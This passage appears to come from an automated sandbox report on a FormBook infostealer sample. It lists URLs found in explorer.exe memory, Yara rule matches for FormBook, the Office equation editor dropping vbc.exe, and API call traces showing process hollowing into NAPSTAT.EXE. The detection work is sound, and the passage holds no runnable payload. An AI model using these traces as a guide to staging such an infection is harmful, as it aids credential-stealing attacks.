          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2095643111.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2094502203.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2095058843.00000000042CB000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.2094118095.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2104512948.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000006.00000000.2095285782.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2094502203.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.2104512948.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000006.00000002.2377357906.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe, Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe, Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe, Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe, Memory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Memory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe, Code function: 4_2_00220110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,ExitProcess,4_2_00220110
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_004181C0 NtCreateFile,5_2_004181C0
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_00418270 NtReadFile,5_2_00418270
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_004182F0 NtClose,5_2_004182F0
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_004183A0 NtAllocateVirtualMemory,5_2_004183A0
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_004181BA NtCreateFile,5_2_004181BA
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_0041826A NtReadFile,5_2_0041826A
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_004182EB NtClose,5_2_004182EB
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008E00C4 NtCreateFile,LdrInitializeThunk,5_2_008E00C4
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008E0048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_008E0048
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008E0078 NtResumeThread,LdrInitializeThunk,5_2_008E0078
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008E07AC NtCreateMutant,LdrInitializeThunk,5_2_008E07AC
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DF9F0 NtClose,LdrInitializeThunk,5_2_008DF9F0
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DF900 NtReadFile,LdrInitializeThunk,5_2_008DF900
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_008DFAD0
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_008DFAE8
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_008DFBB8
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_008DFB68
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_008DFC90
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFC60 NtMapViewOfSection,LdrInitializeThunk,5_2_008DFC60
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFD8C NtDelayExecution,LdrInitializeThunk,5_2_008DFD8C
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_008DFDC0
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_008DFEA0
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_008DFED0
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFFB4 NtCreateSection,LdrInitializeThunk,5_2_008DFFB4
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008E10D0 NtOpenProcessToken,5_2_008E10D0
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008E0060 NtQuerySection,5_2_008E0060
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008E01D4 NtSetValueKey,5_2_008E01D4
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008E010C NtOpenDirectoryObject,5_2_008E010C
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008E1148 NtOpenThread,5_2_008E1148
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DF8CC NtWaitForSingleObject,5_2_008DF8CC
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DF938 NtWriteFile,5_2_008DF938
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008E1930 NtSetContextThread,5_2_008E1930
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFAB8 NtQueryValueKey,5_2_008DFAB8
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFA20 NtQueryInformationFile,5_2_008DFA20
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFA50 NtEnumerateValueKey,5_2_008DFA50
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFBE8 NtQueryVirtualMemory,5_2_008DFBE8
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFB50 NtCreateKey,5_2_008DFB50
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFC30 NtOpenProcess,5_2_008DFC30
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFC48 NtSetInformationFile,5_2_008DFC48
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008E0C40 NtGetContextThread,5_2_008E0C40
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008E1D80 NtSuspendThread,5_2_008E1D80
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFD5C NtEnumerateKey,5_2_008DFD5C
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFE24 NtWriteVirtualMemory,5_2_008DFE24
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFFFC NtCreateProcessEx,5_2_008DFFFC
          Source: C:\Users\Public\vbc.exe, Code function: 5_2_008DFF34 NtQueueApcThread,5_2_008DFF34
          Source: C:\Users\Public\vbc.exe, Code function: 5_1_004181C0 NtCreateFile,5_1_004181C0
          Source: C:\Users\Public\vbc.exe, Code function: 5_1_00418270 NtReadFile,5_1_00418270
          Source: C:\Users\Public\vbc.exe, Code function: 5_1_004182F0 NtClose,5_1_004182F0
          Source: C:\Users\Public\vbc.exe, Code function: 5_1_004183A0 NtAllocateVirtualMemory,5_1_004183A0
          Source: C:\Users\Public\vbc.exe, Code function: 5_1_004181BA NtCreateFile,5_1_004181BA
          Source: C:\Users\Public\vbc.exe, Code function: 5_1_0041826A NtReadFile,5_1_0041826A
          Source: C:\Users\Public\vbc.exe, Code function: 5_1_004182EB NtClose,5_1_004182EB
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 7_2_023400C4 NtCreateFile,LdrInitializeThunk,7_2_023400C4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 7_2_023407AC NtCreateMutant,LdrInitializeThunk,7_2_023407AC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 7_2_0233FAB8 NtQueryValueKey,LdrInitializeThunk,7_2_0233FAB8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_0233FAE8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_0233FAD0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_0233FB68
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FB50 NtCreateKey,LdrInitializeThunk,7_2_0233FB50
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_0233FBB8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233F900 NtReadFile,LdrInitializeThunk,7_2_0233F900
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233F9F0 NtClose,LdrInitializeThunk,7_2_0233F9F0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_0233FED0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FFB4 NtCreateSection,LdrInitializeThunk,7_2_0233FFB4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_0233FC60
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FD8C NtDelayExecution,LdrInitializeThunk,7_2_0233FD8C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_0233FDC0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_02340078 NtResumeThread,7_2_02340078
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_02340060 NtQuerySection,7_2_02340060
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_02340048 NtProtectVirtualMemory,7_2_02340048
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023410D0 NtOpenProcessToken,7_2_023410D0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0234010C NtOpenDirectoryObject,7_2_0234010C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_02341148 NtOpenThread,7_2_02341148
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023401D4 NtSetValueKey,7_2_023401D4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FA20 NtQueryInformationFile,7_2_0233FA20
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FA50 NtEnumerateValueKey,7_2_0233FA50
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FBE8 NtQueryVirtualMemory,7_2_0233FBE8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233F8CC NtWaitForSingleObject,7_2_0233F8CC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_02341930 NtSetContextThread,7_2_02341930
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233F938 NtWriteFile,7_2_0233F938
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FE24 NtWriteVirtualMemory,7_2_0233FE24
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FEA0 NtReadVirtualMemory,7_2_0233FEA0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FF34 NtQueueApcThread,7_2_0233FF34
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FFFC NtCreateProcessEx,7_2_0233FFFC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FC30 NtOpenProcess,7_2_0233FC30
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_02340C40 NtGetContextThread,7_2_02340C40
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FC48 NtSetInformationFile,7_2_0233FC48
